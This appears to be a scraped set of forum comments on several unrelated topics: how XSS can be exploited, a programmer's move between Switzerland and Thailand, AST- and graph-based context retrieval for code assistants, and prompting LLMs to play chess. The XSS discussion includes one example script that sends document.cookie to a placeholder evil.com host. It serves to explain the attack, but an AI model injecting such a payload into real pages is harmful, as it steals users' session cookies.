if you can prefill the form field with post parameters and send that URL to someone else, then you can steal their login cookies etc. Even though the same user who submits the input sees the response, XSS can be exploited:
1. stored XSS (input is saved and later displayed)
Input is stored in a DB or a file and later displayed on the webpage, any future user viewing that page would also execute the malicious script.
Example: attacker submits <script>fetch('http://evil.com/steal?cookie=' + document.cookie)</script>. If this is stored and later displayed, it will run for all users.
2. Immediate XSS
If you can trick another user into clicking a malicious link containing the script, it will execute in their browser.
you cant send post parameters in a URL, those would be get parameters. Now if the field storage method also parsed get parameters I can see that being XSS, I didn’t consider that.
it’s definitely not being stored if it’s immediately printed like in the example , so that’s not a problem
and you don’t need a browser exploit for XSS to be a problem on its own, I just wasn’t sure if that example counts.
I already did:
When I was computer science apprentice in Switzerland in the late 00s, my mate introduced me to Thai culture, as he was half Thai. I planned to be different from all the passport bros and weirdos and made a plan: Finishing my 4 year apprenticeship, working in the industry and get enough money, learn the language spoken and written, the culture, as well as going on a few trips to Thailand with my mates Thai family. Early 2016 my time came: Fluent in Thai, already familiar with BKK and my ability to transform between western and Thai culture smoothly, I landed a job at a Digital Marketing Agency in Bangkok that caters only to the local market. No Expats in the office - my dream came true.
I learned a lot, not just about other cultures, other ways of thinking, but most about myself. I met my now wife, I made great colleagues and friends for life along the way, I had my downs. It was an exciting time with a lot of growth. The agency expanded from initially 15 people to 130, and then into Vietnam and Indonesia as well. Even during Covid we kept operating - though on a slight salary cut.
Fast forward to 2023, I became more and more bored, asked myself if that is it, and most importantly I turned 36 and started to get worried about my wife's and my future, especially retirement. You know, Switzerland has a solid retirement system, social welfare etc. And all of this I gave up, because living abroad means you don't get those... So I convinced my wife to relocate to Switzerland - something she never intended to do. She has to learn a new miniroty language - German - a new culture, a different climate. And most importantly: Her decent office job in Bangkok is something she will have great difficulty to find in Switzerland.
We moved in 2023 and it hasn't been easy, especially for her. But we're happy to live in a safe country with great social welfare, low taxes, high income etc.
So far we had the chance to stay in Thailand every winter and work remotely. So it's kind of the best of both worlds and my employer is great, they allow this type of lifestyle.
What I learned about all this: Your dreams and your goals become irrelevant once you achieved them, either you constantly chase new ones, or you start being happy. And your favorite country always looks great as a tourist or short term visitor, I can really recommend to first try living there temporarily, be it on long holidays or whatever. And most importantly: Don't stay in the expat bubble, learn the language fluently if you plan to stay there. It's a sign of respect and one step towards integrating into society, you don't want to be the outsider forever.
For 2 years I built RAG apps for clients. They are not Code-Assistants but everytime I see code assistants solely relying on embeddings to find the right pieces as context, it feels wrong to me:
Code is very well structured. Based on a starting point (current cursor, current file, or results of an embedding search result) you would probably fair better to traverse the code tree up and down building a tree or using Abstract Syntax Trees (ASTs) as described in this blog post [4]. It's like a tree search in order to get relevant code pieces for a certain task, and it imitates what human coders do. It would integrate well into an agent loop to search relevant code.
Aren't there any open source code assistants and plugins that do this? All I see are embedding searches for the big projects such as cursor, cline or continue.
All I ever found were a few research efforts such as RepoGraph [1], CodeGraph [2] and one one codebase open sourced by Deutsche Telekom called advanced-coding-assistant [3]
Absolutely! Code has vastly more useful structure than prose.
Aider exploits all this structure, using a "repository map" [0]. It use tree-sitter to build a call graph of the code base. Then runs a graph optimization on it with respect to the current state of the AI coding chat. This finds the most relevant parts of the code base, which aider shares with the LLM as context.
Your first link to RepoGraph is an adaptation of the actual aider repo map implementation. In their source code [1], they have some acknowledgements to aider and grep-ast (which is part of aider).
Those are good points, we are currently experimenting with mixing both approaches storing in graph db and vector embeddings. One is giving structured output with querying possibilities (most LLMs are really good at generating Cypher queries) and somewhat general search with embeddings.
The LSP is limited in scope and doesn't provide access to things like the AST (which can vary by language). If you want to navigate by symbols, that can be done. If you want to know whether a given import is valid, to verify LLM output, that's not possible.
Similarly, you can't use the LSP to determine all valid in-scope objects for an assignment. You can get a hierarchy of symbol information from some servers, allowing selection of particular lexical scopes within the file, but you'll need to perform type analysis yourself to determine which of the available variables could make for a reasonable completion. That type analysis is also a bit tricky because you'll likely need a lot of information about the type hierarchy at that lexical scope-- something you can't get from the LSP.
It might be feasible to edit an open source LSP implementation for your target language to expose the extra information you'd want, but they're relatively heavy pieces of software and, of course, they don't exist for all languages. Compared to the development cost of "just" using embeddings-- it's pretty clear why teams choose embeddings.
Also, if you assume that the performance improvements we've seen in embeddings for retrieval will continue, it makes less sense to invest weeks of time on something that would otherwise improve passively with time.
> The LSP is limited in scope and doesn't provide access to things like the AST (which can vary by language).
Clangd does, which means we could try this out for C++.
There's also tree-sitter, but I assume that's table stakes nowadays. For example, Aider uses it to generate project context ("repo maps")[0].
> If you want to know whether a given import is valid, to verify LLM output, that's not possible.
That's not the biggest problem to be solved, arguably. A wrong import in otherwise correct-ish code is mechanically correctable, even if by user pressing a shortcut in their IDE/LSP-powered editor. We're deep into early R&D here, perfect is the enemy of the good at this stage.
> Similarly, you can't use the LSP to determine all valid in-scope objects for an assignment. You can get a hierarchy of symbol information from some servers, allowing selection of particular lexical scopes within the file, but you'll need to perform type analysis yourself to determine which of the available variables could make for a reasonable completion.
What about asking an LLM? It's not 100% reliable, of course (again: perfect vs. good), but LLMs can guess things that aren't locally obvious even in AST. Like, e.g. "two functions in the current file assign to this_thread::ctx().foo; perhaps this_thread is in global scope, or otherwise accessible to the function I'm working on right now".
I do imagine Cursor, et. al. are experimenting with ad-hoc approaches like that. I know I would, LLMs are cheap enough and fast enough that asking them to build their own context makes sense, if it saves on the amount of time they get the task wrong and require back&forth and reverts and tweaking the prompt.
llama 3.2 3b, qwen2.5 3B quantized to 4bit runs CPU inference quite fast. You can get a beefier VM and still save a ton of money. Depending on the context token length of this soluion, it's either fast or slow. If it's below 1024 tokens per request, you get around 10 sec delay, if you are at around 128 tokens I guess you would be somewhere at 1 sec for time to first token...
Can you try increasing compute in the problem search space, not in the training space? What this means is, give it more compute to think during inference by not forcing any model to "only output the answer in algebraic notation" but do CoT prompting:
"1. Think about the current board
2. Think about valid possible next moves and choose the 3 best by thinking ahead
3. Make your move"
Or whatever you deem a good step by step instruction of what an actual good beginner chess player might do.
Then try different notations, different prompt variations, temperatures and the other parameters. That all needs to go in your hyper-parameter-tuning.
One could try using DSPy for automatic prompt optimization.
Can be forced through inference with CoT type of stuff. Spend tokens at each stage to draw the board for example, then spend tokens restating the rules of the game, then spend token restating the heuristics like piece value, and then spend tokens doing a minmax n-ply search.
Wildly inefficient? Probably. Could maybe generate some python to make more efficient? Maybe, yeah.
Essentially user would have to teach gpt to play chess, or training would fine tune chess towards these CoT, fine tuning, etc...
Yeah, the expectation for the immediate answer is definitely results, especially for the later stages. Another possible improvement: every 2 steps, show the current board state and repeat the moves still to be processed, before analysing the final position.
